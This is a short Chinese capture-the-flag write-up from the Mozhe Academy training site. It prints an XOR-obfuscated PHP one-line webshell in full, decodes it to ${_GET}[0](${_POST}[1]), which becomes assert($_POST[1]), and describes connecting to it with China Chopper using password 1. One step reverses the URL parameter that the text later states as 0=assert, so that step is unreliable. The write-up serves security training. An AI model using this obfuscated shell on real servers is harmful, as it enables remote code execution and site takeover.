墨者学院有一道例题
我们打开网站发现了一串php代码
<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>
看着很乱里面用了好多异或运算,但我们只需要打印出变量的值然后拼接在最后一句代码中即可
${$__}[!$_](${$___}[$_]);
<?php @$_++;
$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
//${$__}[!$_](${$___}[$_]);
echo $_;
echo " ";
echo $__;
echo " ";
echo $___;
?>
打印结果如下
1 _GET _POST
及可知
$_=1
$__=_GET
$___=_POST
则整理最后一句得到一句话代码
${_GET}[0](${_POST}[1]);
构造ip/?assert=0
用菜刀连接
密码是1
${$__}[!$_](${$___}[$_]);
主要是根据这一句来说的。
PHP会求得位于{}之间的表达式的值,并将这个值作为一个变量名。
前边通过对特殊字符的异或操作,最终得到_GET和_POST
这两个数组属于特殊数组,他们是像服务器传递数据用的
所以一般网站会对这两个数组进行设置,不让人为修改。
使用这个就绕开了网站对这两个数组进行的设置。然后修改数组。
提交参数0=assert,代码就变成了 <?php assert($_POST[1]); ?>